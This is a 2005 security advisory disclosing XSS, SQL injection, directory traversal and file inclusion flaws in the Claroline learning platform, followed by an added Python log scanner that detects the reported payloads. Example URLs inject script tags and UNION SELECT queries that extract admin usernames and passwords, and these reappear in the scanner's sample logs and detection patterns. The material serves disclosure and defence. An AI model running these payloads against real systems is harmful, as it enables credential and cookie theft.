Zone-H Research Center Security Advisory 200501
http://fr.zone-h.org

Date of release: 27/04/2005
Software: Claroline (www.claroline.net)
Affected versions:
1.5.3
1.6 beta
1.6 Release Candidate 1
(probably previous versions too)
Risk: High
Discovered by:
Kevin Fernandez "Siegfried"
Mehdi Oudad "deepfear"
from the Zone-H Research Team

Background (from their web site)
----------
Claroline is an Open Source software based on PHP/MySQL. It's a
collaborative learning environment allowing teachers or education
institutions to create and administer courses through the web.

Description
-----------
Multiple Cross site scripting, 10 SQL injection, 7 directory traversal
and 4 remote file inclusion vulnerabilities have been found in Claroline.

Details
-------
1) Multiple Cross site scripting vulnerabilities have been found in the
following pages:
claroline/exercice/exercise_result.php
claroline/exercice/exercice_submit.php
claroline/calendar/myagenda.php
claroline/calendar/agenda.php
claroline/tracking/user_access_details.php
claroline/tracking/toolaccess_details.php
claroline/learnPath/learningPathList.php
claroline/learnPath/learningPathAdmin.php
claroline/learnPath/learningPath.php
claroline/tracking/userLog.php
[..]

Examples:
claroline/tracking/toolaccess_details.php?tool=%3Cscript%3Ealert('xss');%3C/script%3E
claroline/tracking/user_access_details.php?cmd=doc&data=%3Cscript%3Ealert('xss');%3C/script%3E
claroline/calendar/myagenda.php?coursePath=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
[..]

2) 10 SQL injections have been found, they could be exploited by users to
retrieve the passwords of the admin, arbitrary teachers or students.
claroline/learnPath/learningPath.php (3)
claroline/tracking/exercises_details.php
claroline/learnPath/learningPathAdmin.php
claroline/tracking/learnPath_details.php
claroline/user/userInfo.php (2)
claroline/learnPath/modules_pool.php
claroline/learnPath/module.php

Examples:
claroline/user/userInfo.php?uInfo=-1%20UNION%20SELECT%20username,password,0,0,0,0,0%20from%20user%20where%20user_id=1/*
claroline/tracking/exercises_details.php?exo_id=-1/**/UNION/**/SELECT%200,password,username,0,0,0%20from%20user%20where%20user_id=1--
[..]

3) Multiple directory traversal vulnerabilities in
"claroline/document/document.php" and "claroline/learnPath/insertMyDoc.php"
could allow project administrators (teachers) to upload files in arbitrary
folders or copy/move/delete (then view) files of arbitrary folders by
performing directory traversal attacks.

4) Four remote file inclusion vulnerabilities have been discovered.

Solution
--------
The Claroline users are urged to update to version 1.54 or 1.6 final:
http://www.claroline.net/download.htm

See also:
http://www.claroline.net/news.php#85
http://www.claroline.net/news.php#86

Timeline
--------
18/04 Vulnerabilities found
22/04 Vendor contacted (quick answer)
25/04 Claroline 1.54 released
26/04 Claroline 1.6 final released
27/04 Users alerted via the mailing list
27/04 Advisory released

French version available here:
http://fr.zone-h.org/fr/advisories/read/id=180/
English version:
http://www.zone-h.org/advisories/read/id=7472

Zone-H Research Center
http://fr.zone-h.org
Join us on #zone-h @ irc.eu.freenode.net
You can contact the team leader at deepfear@private-h.org

Thanks to University Montpellier 2.
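
Added example (not part of the original advisory or of Claroline's code): a Python access-log check that flags requests to the scripts and parameters named in the advisory's examples when they carry markup or a UNION SELECT payload, including the /**/ comment-separated form. Treating uInfo and exo_id as plain integer ids is an assumption, and the log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script paths and parameter names come from the advisory's example requests.
WATCHED = {
    "claroline/tracking/toolaccess_details.php": {"tool"},
    "claroline/tracking/user_access_details.php": {"data"},
    "claroline/calendar/myagenda.php": {"coursePath"},
    "claroline/user/userInfo.php": {"uInfo"},
    "claroline/tracking/exercises_details.php": {"exo_id"},
}
NUMERIC = {"uInfo", "exo_id"}  # assumption: plain integer ids in normal use
TAG_RE = re.compile(r"<\s*/?\s*[a-z!][^>]*>", re.I)
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)
COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(param, value):
    """Return finding labels for one URL-decoded parameter value."""
    found = []
    if TAG_RE.search(value):
        found.append("xss")
    # Inline comments become spaces so UNION/**/SELECT is matched as well.
    if UNION_RE.search(COMMENT_RE.sub(" ", value)):
        found.append("sqli")
    if not found and param in NUMERIC and not value.strip().isdigit():
        found.append("non-numeric-id")
    return found

def scan_line(line):
    """Return (script, param, finding) tuples for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    script = next((s for s in WATCHED if url.path.endswith("/" + s)), None)
    if script is None:
        return []
    query = parse_qs(url.query, keep_blank_values=True)
    return [(script, p, f) for p in sorted(WATCHED[script] & set(query))
            for v in query[p] for f in classify(p, v)]

# Constructed sample log lines (combined log format, documentation IPs).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Apr/2005:10:00:01 +0000] "GET /claroline/user/userInfo.php?uInfo=12 HTTP/1.1" 200 5120',
    '192.0.2.66 - - [27/Apr/2005:10:00:05 +0000] "GET /claroline/user/userInfo.php?uInfo=-1%20UNION%20SELECT%20username,password,0,0,0,0,0%20from%20user%20where%20user_id=1/* HTTP/1.1" 200 4870',
    '192.0.2.66 - - [27/Apr/2005:10:00:09 +0000] "GET /claroline/tracking/exercises_details.php?exo_id=-1/**/UNION/**/SELECT%200,password,username,0,0,0%20from%20user%20where%20user_id=1-- HTTP/1.1" 200 4410',
    '192.0.2.66 - - [27/Apr/2005:10:00:12 +0000] "GET /claroline/calendar/myagenda.php?coursePath=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 3980',
]
```

Running scan_line over each entry of a real access log gives a list of findings per request; an empty list means the watched parameters looked normal.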